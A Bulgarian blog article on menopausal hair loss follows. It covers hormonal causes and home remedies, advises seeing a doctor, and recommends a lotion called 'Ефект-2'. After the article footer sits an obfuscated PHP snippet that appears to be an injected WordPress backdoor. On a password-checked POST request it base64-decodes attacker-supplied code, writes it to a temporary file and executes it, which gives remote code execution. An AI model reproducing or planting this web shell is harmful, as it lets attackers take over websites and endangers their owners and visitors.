Косопадът по време на менопаузата | Косопад

Косопадът по време на менопаузата

menopauza-kosopad

Повечето симптоми на менопаузата са добре известни: задушаване, промени в настроението, промени в цикъла, топли вълни и др. По- слабо известно е обаче как менопаузата влияе на косата. Според експерти, 40% от жените в постменопаузата имат косопад.

За разлика от мъжкия тип оплешивяване, женският косопад не е толкова видим за околните. Докато мъжете губят значителни части от окосмението си, най- вече по темето, жените губят равномерно косата си от целия скалп. Затова в началото на процеса околните не си дават сметка.

koja-menopauza

Хормоните и косопада

Хормоните са много важни за здравето ни, но в менопаузата функциите им се изменят, което неминуемо се отразява. Както по време на бременност промяната в хормоните карат косата да расте по- бързо, в менопаузата започва на пада.

Най- правилното решение е да се обърнете към лекар, ако сте в такава ситуация. Можете обаче да използвате и различни домашни и природни решения: балансирано и здравословно хранене, прием на витамини, може да пиете бял и зелен чай. На пазара пък най- доказаният продукт в сферата на косопада и оплешивяването е лосионът „Ефект- 2„.

Когато се възстанови баланса в хормоните, няма да имате проблем с косопада. Не забравяйте обаче, че има и други фактори, които влияят, като стреса. Така че старайте да си почивате и да релаксирате.

07. август 2014 12:25:41 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}